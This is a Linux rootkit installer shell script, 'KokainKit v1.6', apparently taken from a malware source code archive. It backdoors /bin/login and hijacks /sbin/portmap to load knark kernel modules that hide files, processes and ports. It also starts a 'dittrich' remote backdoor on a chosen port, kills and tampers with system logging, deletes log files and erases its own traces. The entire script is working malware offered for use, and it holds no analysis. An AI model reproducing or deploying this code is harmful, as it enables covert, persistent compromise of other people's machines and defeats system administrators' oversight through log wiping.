MalwareSourceCode/Linux/Backdoors/Linux.Kokain.Backdoor
2020-11-03 21:16:20 +01:00

175 lines
4.4 KiB
Bash
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/bin/sh
# KokainKit v1.6 by deka
# -
# A rootkit based on knark and cobolt.
# Do not Distribute!
# -
TORNDIR=/usr/src/.puta
THEPASS=$1
DITTPORT=$2
THEDIR=/usr/lib/$THEPASS
echo "---------------------------------------"
echo " KokainKit v1.6 by dekah&self"
echo "---------------------------------------"
echo ""
echo "Using magic word $THEPASS and dittrichport $DITTPORT."
echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
if ! test "$(whoami)" = "root"; then
echo " - UID0 check failed"
echo ""
sleep 3
echo "FATAL: You're not root"
exit 1
fi
if test -d "$TORNDIR"; then
echo " - T0rnKit found. Screwing it up"
killall -9 in.inetd
killall -9 t0rntd
echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
echo "" > /usr/sbin/in.inetd
echo "ap" > $TORNDIR/.1file
echo "255.255" > $TORNDIR/.1addr
echo "255.255" > $TORNDIR/.1logz
echo "ap" > $TORNDIR/.1proc
fi
if ! test -d "/usr/include"; then
echo " - /usr/include does not exist, making it (ugly)..."
mkdir /usr/include
fi
if ! test -d "/usr/include/pwdb"; then
echo " - /usr/include/pwdb does not exist, making it (ugly)..."
mkdir /usr/include/pwdb
fi
mkdir $THEDIR
if test -d "$THEDIR"; then
echo " - Secret dir created"
else
echo " - MkDir failed"
echo ""
echo "FATAL: Unable to create the secret directory"
exit 1
fi
cd src
echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h
gcc -O2 cobolt.c -o cobolt
if test -r "./cobolt"; then
echo " - Cobolt compiled"
else
echo " - gcc failed"
echo ""
cd ..
sleep 3
echo "FATAL: Unable to compile Cobolt"
exit 1
fi
touch -acmr /bin/login cobolt
cp /bin/login $THEDIR/login1
cp cobolt $THEDIR/login2
echo " - Cobolt installed"
gcc -O2 autoexec.c -o autoexec
if test -r "./autoexec"; then
echo " - AutoExec compiled"
else
echo " - gcc failed"
echo ""
cd ..
echo "FATAL: Unable to compile AutoExec"
exit 1
fi
touch -acmr /sbin/portmap autoexec
cp /sbin/portmap $THEDIR/portmap
rm -f /sbin/portmap
cp autoexec /sbin/portmap
echo "#!/bin/sh" > $THEDIR/autoexec
echo " - AutoExec installed"
cd ..
killall -9 syslogd klogd
./wipe u root >/dev/null 2>&1
rm -f /var/log/messages /var/log/secure
cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
echo " - Logs cleaned"
#echo "" > /etc/hosts.allow
#echo "" > /etc/hosts.deny
#echo " - Hosts.deny/Hosts.allow cleaned"
echo " - Patching dittrich..."
./bpatch ./dittrich __PATCHPort__ $DITTPORT
cat <<E0F>> $THEDIR/.bashrc
alias ls="ls --color -alF"
alias dir="dir --color"
export PS1="\u@\h:\w# "
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
cd
E0F
echo " - .bashrc created"
cp -R dittrich stuff $THEDIR
echo " - Stuff installed"
mkdir $THEDIR/knrk
cd knark
make >/dev/null 2>&1
echo " - Knark compiled"
cd ..
rm -rf knark/knrksrc knark/Makefile
cp -R knark/* $THEDIR/knrk
echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
echo "$THEDIR/dittrich" >> $THEDIR/autoexec
echo "killall -31 dittrich" >> $THEDIR/autoexec
/sbin/portmap >/dev/null 2>&1
echo " - Knark installed"
if test -d "/var/named/ADMROCKS"; then
rm -rf /var/named/ADMROCKS
echo " - AdmRocks erased"
fi
cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
rm -f /etc/inetd.conf
cp /tmp/blahah /etc/inetd.conf
rm -f /tmp/blahah
echo " - Inetd.conf fixed"
PATH=/sbin:$PATH
syslogd
klogd
echo " - Syslogd/Klogd restarted"
cd ..
rm -rf *kokain*
echo " - KokainKit removed"
echo ""
#echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
if test -d "/proc/$THEPASS";
then
echo "Knark installed successfully."
else
echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
cp $THEDIR/login2 /bin/login
fi
echo "kitinst $THEPASS $DITTPORT"
# - EoF - #